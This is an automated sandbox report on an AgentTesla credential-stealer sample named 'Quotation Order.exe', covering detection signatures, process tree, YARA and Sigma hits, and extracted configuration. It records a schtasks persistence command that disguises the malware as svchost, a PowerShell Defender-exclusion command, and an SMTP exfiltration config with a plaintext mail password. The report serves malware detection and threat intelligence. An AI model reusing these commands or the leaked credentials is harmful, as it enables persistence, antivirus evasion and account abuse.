Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation Order.exe

Overview

General Information

Sample name:Quotation Order.exe
Analysis ID:1432027
MD5:d797aae1eaf481e9c887482192b84109
SHA1:acf58b4eb3f0ffda9a2cd91def583422a11ed873
SHA256:cbda8606094d0493370b0f219edaba9be92444967aa9259d3e9323314dca2daa
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Disables UAC (registry)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quotation Order.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\Quotation Order.exe" MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7912 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8016 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8024 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • svchost.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: D797AAE1EAF481E9C887482192B84109)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegSvcs.exe (PID: 7416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • AddInProcess32.exe (PID: 8032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • InstallUtil.exe (PID: 7972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • CasPol.exe (PID: 7440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
        • CasPol.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
        • WerFault.exe (PID: 8040 cmdline: C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7488 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7564 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7600 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7668 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7700 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8072 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • InstallUtil.exe (PID: 1984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • RegAsm.exe (PID: 7368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • AddInProcess32.exe (PID: 7976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 7472 cmdline: C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7928 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8092 cmdline: C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7888 cmdline: C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7892 cmdline: C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6872 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 7240 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 8000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • avdfUcC.exe (PID: 1240 cmdline: "C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6284 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: D797AAE1EAF481E9C887482192B84109)
    • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 4884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.bonnyriggdentalsurgery.com.au", "Username": "hr1@bonnyriggdentalsurgery.com.au", "Password": "Sages101*"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.1627243849.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001A.00000002.1487009646.0000000002BFE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000002B.00000002.2520439287.0000000002FAD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 40 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.2.svchost.exe.1fc9f239308.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              17.2.svchost.exe.1fc9f239308.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                17.2.svchost.exe.1fc9f239308.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3283e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x328b0:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3293a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x329cc:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x32a36:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x32aa8:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x32b3e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32bce:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                17.2.svchost.exe.1fc9f1fd6c0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  17.2.svchost.exe.1fc9f1fd6c0.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 13 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Quotation Order.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Order.exe", ParentImage: C:\Users\user\Desktop\Quotation Order.exe, ParentProcessId: 7384, ParentProcessName: Quotation Order.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7912, ProcessName: cmd.exe
                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Order.exe", ParentImage: C:\Users\user\Desktop\Quotation Order.exe, ParentProcessId: 7384, ParentProcessName: Quotation Order.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7912, ProcessName: cmd.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Suspect Svchost Activity
                    Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8092, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 8072, ProcessName: svchost.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8092, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 8072, ProcessName: svchost.exe
                    Sigma detected: Conhost Spawned By Uncommon Parent Process
                    Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 8080, ProcessName: conhost.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Quotation Order.exe, ProcessId: 7384, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.254.225.166, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Initiated: true, ProcessId: 7440, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49703
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7912, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 8016, ProcessName: schtasks.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7936, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 8164, ProcessName: svchost.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 8072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 7216, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7488, ProcessName: svchost.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation Order.exe", ParentImage: C:\Users\user\Desktop\Quotation Order.exe, ParentProcessId: 7384, ParentProcessName: Quotation Order.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 7912, ProcessName: cmd.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 26.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.bonnyriggdentalsurgery.com.au", "Username": "hr1@bonnyriggdentalsurgery.com.au", "Password": "Sages101*"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 31%
                    Multi AV Scanner detection for submitted file
                    Source: Quotation Order.exeReversingLabs: Detection: 31%
                    Source: Quotation Order.exeVirustotal: Detection: 28%Perma Link

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation Order.exe PID: 7384, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7412, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6284, type: MEMORYSTR
                    Source: Quotation Order.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Core.pdbmscorlib.dllSystem.dll@ source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
